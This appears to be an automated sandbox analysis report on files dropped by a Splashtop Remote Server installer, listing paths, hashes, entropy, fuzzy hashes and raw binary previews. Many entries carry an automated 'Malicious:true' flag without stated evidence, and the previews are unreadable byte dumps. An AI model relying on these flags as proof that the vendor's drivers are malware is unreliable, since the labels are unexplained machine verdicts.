                                                                                                                                                                                                                                                                                                                                  SHA1:C6D8D4BF754DA24C0C9B39DFF0B336120BF3829A
                                                                                                                                                                                                                                                                                                                                  SHA-256:86688C2EAFB525E2E0E6723907E15567E426670C6B9934E129218A45F47B117A
                                                                                                                                                                                                                                                                                                                                  SHA-512:E9CEBA750A44248860A5980475D41358C0E0B78EF65BF823995572AA091804D3AF836A2A456A8C4A394AE57AF2B8589DFBF561D1007A3A600136A0746EFFB479
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w....y...y...y...x...y..n..y..n....y..n..y..n..y.Rich..y.........PE..L...'.9S...........!.........................0......................................s........................................`..<....p..X............:..........H...`0...............................................0..T............................text...<........................... ..h.rdata.......0......................@..H.data........@......................@...INIT.........`.......0.............. ....rsrc...X....p.......2..............@..B.reloc...............8..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stmirror.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.040113518412221
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:Dq8YdZrnYe+PjPGr9ZCApkT1rrZgjldrXa+v5lPr9NH7:Dqjd9nYPL/p1P6j7rd7
                                                                                                                                                                                                                                                                                                                                  MD5:3C1EBF4DFC9685F1D584F0D6F421391C
                                                                                                                                                                                                                                                                                                                                  SHA1:99FB5FD1A755AC038818776C6FCB964FD027334F
                                                                                                                                                                                                                                                                                                                                  SHA-256:237BC4CD7AC38B503EF2D319C484EEAE07562AB09629C218B5C5BEEB8D5A8586
                                                                                                                                                                                                                                                                                                                                  SHA-512:84C5DCFBAEA40091F7D1D5003414FFA8926B3CEFFADD08071297C5F5A6929557D8EF36BE22181431CA56E773669CD1F15DCFA16494C935EF0C15707102A4A73F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q....................................................Rich....................PE..L...'.9S............................>@....... ...............................p..............................................P@..<....P.......................`..0... ............................................... ...............................text............................... ..h.rdata....... ......................@..H.data........0......................@...INIT.........@...................... ....rsrc........P......................@..B.reloc..V....`......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.807178448617145
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:KHpo0tYsmKZWZ3/ECwTnYe+PjPGr9ZCApkT1rrZgjldrXa+v5lfr9mOsPkHsV:Pe+jwTnYPL/p1P6j7TmOfHsV
                                                                                                                                                                                                                                                                                                                                  MD5:36F961C6308CB0B919E659EB1B738AFA
                                                                                                                                                                                                                                                                                                                                  SHA1:FC795A8FD24CBB3267474D99922CFF1BEE5F242D
                                                                                                                                                                                                                                                                                                                                  SHA-256:4212786F0C3D5A00502A5926DE4E111BC9ABB84A4953C93DA6E17DCE4EC902E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:923A0C4B1454C4DEDA5AFD423B34D51FD9AECBBFC610006FC062CF031C81D4A2FDC94098E9DCA4FC16B25FE0766ECDEC12F450E8E4BC701F17832D3715F70C91
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.-...*.H........-.0.-....1.0...+......0..]..+.....7.....N0..J0...+.....7........PW3.@.<...`.c..140331064154Z0...+.....7.....0...0....R1.5.4.3.1.9.0.6.C.F.3.8.F.8.6.0.1.1.8.5.5.2.3.8.2.B.A.9.6.B.B.D.7.7.6.A.5.7.3.1...1..c0:..+.....7...1,0*...F.i.l.e........s.t.v.i.d.e.o...d.l.l...0V..+.....7...1H0F...O.S.A.t.t.r.......02.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+.........C...8.`..R8+.k.wjW10....R2.9.7.2.3.F.C.3.1.1.0.6.4.6.4.9.3.F.8.2.4.3.9.D.A.8.1.C.0.A.B.A.8.7.B.9.6.3.1.7...1..e0<..+.....7...1.0,...F.i.l.e........s.t.m.i.r.r.o.r...s.y.s...0V..+.....7...1H0F...O.S.A.t.t.r.......02.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.022305855965037
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:cdot9XqRolBJB3gP9tRHY8QjSec95NLnYe+PjPGyz/wOgjJ5Q7:cduaCvJQY8QjSz9vnYPLGKGI
                                                                                                                                                                                                                                                                                                                                  MD5:AF512AA3612DEA5C2E2FAE866898EED5
                                                                                                                                                                                                                                                                                                                                  SHA1:803810F8648832AB81DDF3B3C5862077EF6AFD4F
                                                                                                                                                                                                                                                                                                                                  SHA-256:FBBEE200CBD1663A0F6D6F9FAD4502004DD4922C2257CC8AF6CBFB4DE1CBDB12
                                                                                                                                                                                                                                                                                                                                  SHA-512:857D6F4F13ADACE91E7C90B6CADF601C87F3D98C9916C3D6079B153A48B7A9F16A5DB79B92D9E087F1646FE12DD65890292475D2D4DD0C823354EAA0B4BA5939
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m..)...)...)...)....... ....... ...+... .../... ...(... ...(...Rich)...........PE..L...'.9S...........!.........6............... ...............................................................................`..<....p..P............&..............p ............................................... ..h............................text............................... ..h.rdata....... ......................@..H.data....)...0......................@...INIT....H....`...................... ....rsrc...P....p......................@..B.reloc...............$..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4694
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.249583632564649
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:E+5iOJLGq6BFPmfsLkfsof96zdUyLiypkTsTetTtqBlFL+WC:E+5iOJLGqsFPmfsLkfs86zdUyLiypkAU
                                                                                                                                                                                                                                                                                                                                  MD5:BA4F5D984CB8611E64BFCEDE9C3B8E93
                                                                                                                                                                                                                                                                                                                                  SHA1:AC67AA1C6C892FC04FC740647815F74C6671DD34
                                                                                                                                                                                                                                                                                                                                  SHA-256:A31E1D6AE465C93B847D47BCECAE94E24B918BFF73DD7D9B31E6789322591DDD
                                                                                                                                                                                                                                                                                                                                  SHA-512:16F3528FA573C612A0CF1BB772FB3C3DE2C4EBA619621E33DE0337D0954DE115BA39FAD0D7FD9816849E2BBC430EB84AAA802AA9F861F0B94EC890C9E19BCEBD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:; stvideo.inf..;..; Installation file (.inf) for the splashtop device...;..; (c) Copyright 2011-2014 Splashtop drivers ..;....[Version]..Signature="$CHICAGO$"..Provider=%splashtop%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=03/31/2014,1.0.2.0..CatalogFile="stvideo.cat"....[SourceDisksNames]..99 = %DiskId%,,,....[SourceDisksNames.amd64]..99 = %DiskId%,,,\64bits....[SourceDisksFiles]..stvideo.dll = 99..stmirror.dll = 99..stvideo.sys = 99..stmirror.sys = 99....[DestinationDirs]..DefaultDestDir = 11..stvideo.Miniport = 12..stvideo.Display = 11..stmirror.Display = 11..stmirror.Miniport = 12....[Manufacturer]..%splashtop% = stvideo_Mfg, NTx86, NTamd64....[stvideo_Mfg.NTx86]..%splashtop.DeviceDesc% = stvideo, STVideo_Driver..%splashtop.DeviceDesc% = stvideo_win7, STVideo_Driver_Win7..%splashtop.MirrorDeviceDesc% = stmirror, STMirror_Driver....[stvideo_Mfg.NTamd64]..%splashtop.DeviceDesc% = stvideo, STVideo_Driver..%splashtop.DeviceDesc% = stvi

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.040343349200973
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:Ddg2s4nYe+PjPGr9ZCApkT1rrZgjldrXa+v5lPr9xu5eF:Di2hnYPL/p1P6j7rxbF
                                                                                                                                                                                                                                                                                                                                  MD5:46DF2F9B00DA96B8603F472EC4BEB416
                                                                                                                                                                                                                                                                                                                                  SHA1:AFB25F23A849DAFECA73DFA6B0DF428619F6224E
                                                                                                                                                                                                                                                                                                                                  SHA-256:8196CA7ED6BF904E00E2A2955AC8288801AA3983384268D5DF85F52AE10FC974
                                                                                                                                                                                                                                                                                                                                  SHA-512:0284D0D1A025AED097C375343018DF023A7058CF741BFDE9D97DC647548BD18C05B068268818E6542954BDBB1FDF0B992277C565865A2084DF9BFA2E33A9FBDC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q....................................................Rich....................PE..L...'.9S............................>@....... ...............................p.............................................P@..<....P.......................`..0... ............................................... ...............................text............................... ..h.rdata....... ......................@..H.data........0......................@...INIT.........@...................... ....rsrc........P......................@..B.reloc..V....`......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\Mirror2Extend.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.214858942297855
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:T6pztvRXL6L1T9mV0OTpJoNGDP5t2IhmX+o:T4tmL1EXCNGVt2IhmX+o
                                                                                                                                                                                                                                                                                                                                  MD5:3B83E955AB0C3A815E0ED69EB6407C52
                                                                                                                                                                                                                                                                                                                                  SHA1:995657C40BC9A28D36AFEA59FE8549B916F81B95
                                                                                                                                                                                                                                                                                                                                  SHA-256:0C2EBB467661D404BCA91A080CCA0E5836797EFC474B62A3D22FB3419E3C8B52
                                                                                                                                                                                                                                                                                                                                  SHA-512:1943EB1AFE81116657CBB33E87C7683CCF6D9EF22F59E5CEE840705E486A176DB5A7D67114A46ECDFC47A1B351F94DDEC72A05BDFB29CA6709CC696D877FDEBA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........X..SX..SX..SQ..Sz..SQ..SH..SQ..S;..SQ..S_..SX..S...SQ..SZ..SQ..SY..SRichX..S........PE..L.....M.....................D....................@..........................0......|.....@.................................T...P............................ ..@...p...................................@...............(............................text...4........................... ..`.rdata... ......."..................@..@.data....+..........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\devcon.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L..."..."..."....."......"......"...#.S."....."..`\..."......"......".Rich..".................PE..L...#.pK.................l..........Td.......................................P............@...... ..........................lm..........p....................@...... ...............................0...@............................................text... j.......l.................. ..`.data...4............p..............@....rsrc...p............v..............@..@.reloc.......@.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\devcon64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9...9...9...AF..9...AW..9...A@..9...9..f9...AP.9...AY..9.......9...AG..9...AB..9..Rich.9..........................PE..d.....pK.........."......~...........s.......................................p......|.....@.......... ......................................X}..........p.......T............`......0................................................................................text....|.......~.................. ..`.data...x...........................@....pdata..T...........................@..@.rsrc...p...........................@..@.reloc..p....`.......>..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x64\SRUsb.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):542216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.466753301083591
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:TXL84WA5C/KIcgHrlti0XoppdpRFT/FKf51PnofX09v:TXL84lopcgRti9FT/FKvnuX4v
                                                                                                                                                                                                                                                                                                                                  MD5:BB241F864550BFA8AD2346C65E0CE41C
                                                                                                                                                                                                                                                                                                                                  SHA1:378769EE7D6CA44554103E6A23F1BD20BB9E2564
                                                                                                                                                                                                                                                                                                                                  SHA-256:58C4394BBE98BA2B9344209CDC98F5DB854A385ABEB4C74BD111B0ED661D1D61
                                                                                                                                                                                                                                                                                                                                  SHA-512:68CF0A4CC802A10C218B3155D427DA5DFB6EDEA7671A41D016A5844011896C84490123E008CDAC2A4C5C60150B777F6742BA47A95050DFC1DBDEE20E332765EC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s.gS..4S..4S..4.`.5Y..4.`.5...4.`.5I..4.l.5C..4.l.5Y..4.l.5...4.`.5B..4S..4...4Gm.5Y..4Gmh4R..4S..4R..4Gm.5R..4RichS..4........PE..d......e.........."....$.....B......p".........@....................................9.....`.................................................d........p...........A.......(......D....&..p....................'..(....%..@............................................text............................... ..`.rdata.............................@..@.data....5..........................@....pdata...A.......B..................@..@_RDATA..\....`......................@..@.rsrc........p......................@..@.reloc..D...........................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x64\SRUsbVhciCtrl64.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2816416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.82236063017737
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:wVaHMTDMmyUZe4RF+A8LO9Us1BXEne0Nxx4kta2R74IIjvmIFe5mxoDpuBw1s31n:wVTuERKy9v1BXEne0Nxx4kta2V4IIjvZ
                                                                                                                                                                                                                                                                                                                                  MD5:DF362B11095D0F59ECF9DDC0DAF61B12
                                                                                                                                                                                                                                                                                                                                  SHA1:6BB3B490F048FD1306D714651F6C2C488BC318D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:BAFA22DA91BF2B44E4EFBBDFB8D7FB64B6F8A04569F2737EA49C384CDAD193F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:0A03BBF0DEF16E78556041DAC5EF003957384C37F07B08EBC0917921DC30189C2E3CFF7F91F369BD7195A8EE3E84D194113F0D889897C5679DEA263F27821FFE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...2..e.........." ......*...... ..0.I..0....................................J.....v.+...`...........................................I.\.....I.<.....I...... G.......*..-..,.I.............................(.I.(...................................................UPX0..... ..............................UPX1......*..0....*.................@....rsrc.........I.......*.............@...3.96.UPX!.$..c-rX...OI>H...*...G.I..l....H....F........@.AWAVATVWUSH.. A..|.........................f.....{...... H.5.....}..g1..H..>t.(...%.....?..v......=u.f=.....<......"g.|.....w..H....M..I..eh.%00.....p..P.7...t$H9.....-...=.uv.T...5!..u......f....,...>.u....H........#.a.2...&/.d......[..a.D...R....t.L..A.....{..O......E1....D.....m. []_^A\A._.a.y(.p...f.._....Uc(L.9^A..1>l..t....y..v.....z....G..w**.....$(...SW...)...,...."[\...=...2s.....E....F1...&;..v....y.wp.....t#.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x86\SRUsb.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):465928
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6188868975232875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:nmELSchToqY92QUOMIsV7iPSdutxml26jmlE662:bnAUF1pAb
                                                                                                                                                                                                                                                                                                                                  MD5:12A3EF8EF5D70994B9500FA0801F8903
                                                                                                                                                                                                                                                                                                                                  SHA1:C06C2AC1CC4B7D50DDFD36E32CDB2274618294B7
                                                                                                                                                                                                                                                                                                                                  SHA-256:520C5A35F943B06888A96339EB2B8B5BEEB70046B5835DC0190AF77B4E0824FC
                                                                                                                                                                                                                                                                                                                                  SHA-512:EF4AE07C1F2A636D57F5FA64505CE8CA581FAFD450DAC9FFAED69B84259BC21A3632E401577FA996C5C699352B07325CA7CB4CF82FD46E3C98E506E08B3125E0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Lyqa...2...2...2.j.3...2.j.3...2.j.3...2.f.3...2.f.3...2.f.3S..2.j.3...2...2...2.g.3...2.g.2...2...2...2.g.3...2Rich...2........PE..L......e...............$.X..........7........p....@..........................@......B ....@.................................4............................(......t8...P..p....................Q...... P..@............p..8............................text....V.......X.................. ..`.rdata...A...p...B...\..............@..@.data....%..........................@....rsrc...............................@..@.reloc..t8.......:..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x86\SRUsbVhciCtrl32.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2581408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.8335475472495375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:bGF1tZkcS3fy3i9Ov8l6/kKkN6PLsCzvDxg7abakf35UXAtuwHgLYV1G4DW1L6Ky:bs1kcS3fy3pv8l6/kKqiLpPuabakf35n
                                                                                                                                                                                                                                                                                                                                  MD5:348AF13556E619DA13459047DAB625B9
                                                                                                                                                                                                                                                                                                                                  SHA1:6F3CB9022C715AFC6156A44A73D9D10147AB6CA4
                                                                                                                                                                                                                                                                                                                                  SHA-256:75BDBB78A7CEE839496A8E643E2E631D04E243C4B466F3AF7FCD8C8A01288807
                                                                                                                                                                                                                                                                                                                                  SHA-512:344C43F62910CF5D1B31AA3A17E0A581C438055D49DC59071574F3D1A500C0945AFE89C2AB54045140B4EB79221B5A7E0814056C5600055FD3A0D458436D9CC0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...[..e...........!.....0'......."...J..."...J.............................. J.....+-(...@......................... .J.\.....J.......J..............6'..-..|.J...............................J.....................................................UPX0......".............................UPX1.....0'..."..*'.................@....rsrc.........J......,'.............@...3.96.UPX!.....'.tl..8..I..''...H.&...o...h.>e....`....f.USWV....D$........tz....M".R...-..........5..p..a1....>t...."}..........h.....9u.=s.Z.^.......>..6...........nd...h.v...k../...t 9.t....{3m.7.u.-.E.n..~.u.j..."L.".}u......2e.J ....PQ.......k.PC..$...z........X.IL.6t......t$.j.....C...1...........^_[]...V.L$.TJ...$......a...P...^^Jf..4...?......UX...._/............F.^|.<.w&.VW...v.t...v%.!."LqO...."..9...,...WJ.d.....)Rj.s...W.h.G]....qA..<$G...C*.+t..G.#..@?.1?.....x7....$./...h..".ul......

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x64\SRWacomCtrl64.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3116552
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.392745373577217
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:bPZ5TNGpStg+wTMz3Q8giStLONyAppqk8W+OcVpcL0865eGzYPcL1l:gtMziR8k1DcLv6xL1l
                                                                                                                                                                                                                                                                                                                                  MD5:9CA925B6A0CFA7F8B0222233B3494D05
                                                                                                                                                                                                                                                                                                                                  SHA1:20EF67FDEA63178B92D2BF4755C02687DC9D9022
                                                                                                                                                                                                                                                                                                                                  SHA-256:5C66BE5F5D9A8CD7CBD5F31EF3AAFE7A422186E9B21AC564B58362508BF0583A
                                                                                                                                                                                                                                                                                                                                  SHA-512:FBF69CAB559363EE0C16E4F04A7A3BED101B1B7D96383D2E092DE6EED505522CC7D1FEA1900FB0A63293BDEE34A5006583A1540D61043439CCE4EB12FF505879
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
